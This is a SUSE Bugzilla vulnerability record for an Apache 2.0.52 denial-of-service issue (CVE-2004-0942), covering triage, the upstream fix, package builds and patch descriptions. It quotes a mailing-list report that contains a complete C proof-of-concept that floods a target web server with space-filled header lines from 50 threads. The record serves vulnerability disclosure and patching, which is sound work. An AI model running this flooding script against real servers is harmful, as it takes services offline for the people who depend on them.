Bugzilla – Bug 62967
VUL-0: CVE-2004-0942: Apache2 DoS
Last modified: 2021-10-16 09:11:09 UTC
We received the following report via full-disclosure. The issue is public. Not a very efficient DoS, one needs to send huge amounts of data: http://www.apacheweek.com/features/security-20 CAN-2004-0942 Date: Mon, 1 Nov 2004 15:27:42 +0530 From: Chintan Trivedi <chesschintan@gmail.com> To: full-disclosure@lists.netsys.com Subject: [Full-Disclosure] DoS in Apache 2.0.52 ? Hi, I was doing some testing on Apache webserver ver 2.0.52 (unix) and previous versions. Just found that a special type of request consumes lot of CPU usage and hangs the webserver. It even hangs other services like ssh, ftp .. For Apache 2.0.52 a request like GET / HTTP/1.0\n [space] x 8000\n [space] x 8000\n [space] x 8000\n . . 8000 times consumes a lot of cpu. I created 25 threads (connections) and send the above request to one webserver. After just 2-3 minutes of flooding, the server wasnt able to fulfill any http requests. Even ssh and such other services well also hanged up. The time required for the attack was just maximum 5 minutes. I am not sure whether it is a valid DoS or not. Replacing the <space> with any other char will break the connection just after a few lines(130 or so) of header. Checking the httpd-2.0.52/server/protocol.c file i see the code for the mime headers. It checks for the first char of the header. If it is a "space" it considers it as an extension to the previous line header. The problem seems to be similar to the advisory published by Guninsky few weeks ago -> http://www.guninski.com/httpd1.html thought its a bit different. That fix was for the long request field header when the header line is extended in the next line using space. Well i guess 8K limit for the number of headers filled with spaces is quite huge. Its enuf to DoS the server using a few threads. You can check the attached C file to test it. The file is compiled on windows system using VC++ 6.0. -----------------POC---------------------------- /// Apache 2.0.52 and earlier DoS #include "stdafx.h" #include "winsock.h" #include "string.h" #include "stdio.h" #include "windows.h" #pragma comment(lib,"ws2_32") DWORD WINAPI attack(LPVOID); char target[256]; int main(int argc, char* argv[]) { int l=0; int j; DWORD dw; HANDLE hd; if(argc<2) { printf("usage: %s target", argv[0]); exit(0); } strncpy(target, argv[1], 256); printf("Attaching %s ...\n", target); for(j=0;j<50;j++) hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw); for(j=0;j<50;j++) WaitForSingleObject(hd, INFINITE); printf ("done"); return 0; } DWORD WINAPI attack(LPVOID l) { int s; SOCKADDR_IN sck; HOSTENT *host; char buff[256]; char space[8000]; int i; WSADATA wsadata; WSAStartup(MAKEWORD(1,1),&wsadata); memset(space, ' ', 8000); space[7998]='\n'; space[7999]='\0'; if((host=gethostbyname(target))==NULL) { printf("Host not found"); return -1; } sck.sin_family = PF_INET; memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length ); sck.sin_port = htons(80); if((s=socket(AF_INET,SOCK_STREAM,0))==-1) { printf("Socket couldn't be initiallized"); return -1; } if((connect(s,(struct sockaddr *)&sck,sizeof(sck)))) { printf("Couldn't connect"); return -1; } sprintf(buff, "GET / HTTP/1.0\n"); //printf("%s",buff); int len=strlen(buff); if((send(s,buff,len,0))==-1) { printf ("send error"); closesocket(s); return -1; } for(i=0;i<9999;i++) { if((send(s,space,strlen(space),0))==-1) { printf("Send Error on header number %d", i); closesocket(s); return -1; } } closesocket(s); return 0; } ------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Fixed in 2.0.53-dev, patch available in 2.0 CVS: http://cvs.apache.org/viewcvs.cgi/httpd-2.0/server/protocol.c?r1=1.158&r2=1.159
Packages submitted to autobuild: /work/SRC/old-versions/8.1/all/apache2 -> /work/src/done/8.1 /work/SRC/old-versions/8.2/all/apache2 -> /work/src/done/8.2 /work/SRC/old-versions/9.0/all/apache2 -> /work/src/done/9.0 /work/SRC/old-versions/9.1/BETA/all/apache2 -> /work/src/done/SLES9-SP1 /work/SRC/old-versions/9.1/SLES/all/apache2 -> /work/src/done/9.1 /work/SRC/old-versions/9.2/all/apache2 -> /work/src/done/9.2 plus STABLE. ------------------------------------------------------------------- Mon Nov 8 19:18:52 CET 2004 - poeml@suse.de - security fix [CAN-2004-0942 (cve.mitre.org)]: Fix for memory consumption DoS [#47967] - security fix [CAN-2004-0885 (cve.mitre.org)]: fix SSLCipherSuite bypass in mod_ssl [#47117] -------------------------------------------------------------------
Patchinfos?
I'll attach and submit them shortly.
thanks. /me cancels context switch ;)
Created attachment 25920 [details] patchinfo files for 8.1, 8.2, 9.0, 9.1, 9.2 and SLES9 poeml@aust ~/tmp % tar tvzf patchinfos-apache2.tar.gz drwxr-xr-x poeml/suse 0 2004-11-09 16:18:48 patchinfos-apache2/ -rw-r--r-- poeml/suse 1071 2004-11-09 16:17:27 patchinfos-apache2/patchinfo.apache2.box.81 -rw-r--r-- poeml/suse 1070 2004-11-09 16:17:32 patchinfos-apache2/patchinfo.apache2.box.82 -rw-r--r-- poeml/suse 1098 2004-11-09 16:17:45 patchinfos-apache2/patchinfo.apache2.box.90 -rw-r--r-- poeml/suse 1066 2004-11-09 16:17:51 patchinfos-apache2/patchinfo.apache2.box.91 -rw-r--r-- poeml/suse 1066 2004-11-09 16:18:21 patchinfos-apache2/patchinfo.apache2.box.92 -rw-r--r-- poeml/suse 839 2004-11-09 16:18:48 patchinfos-apache2/patchinfo.apache2.sles DESCRIPTION: An issue allowing a remote Denial of Service attack has been fixed (the request field length limit was not enforced for certain malicious requests). A vulnerability in the mod_ssl module has been fixed (bypass of the "SSLCipherSuite" directive, when configured in directory or location context). CAN-2004-0942 and CAN-2004-0885 have been assigned to these issues. DESCRIPTION_DE: Bei bestimmten Requests wurden Beschraenkungen von zu langen Kopfzeilen nicht angewendet, was zu entsprechendem Speicherverbrauch des Servers fuehren konnte und damit entfernten Angreifern einen Denial of Service-Angriff erlaubte. Aussedem wurde eine Schwachstelle im mod_ssl Modul behoben (Aushebeln der "SSLCipherSuite"-Direktive, wenn sie im in einem Directory- oder Location Kontext verwendet wurde). Die Kennungen CAN-2004-0942 und CAN-2004-0885 wurden diesen Schwachstellen zugewiesen.
I assign to security-team for further processing
approved
CVE-2004-0942: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)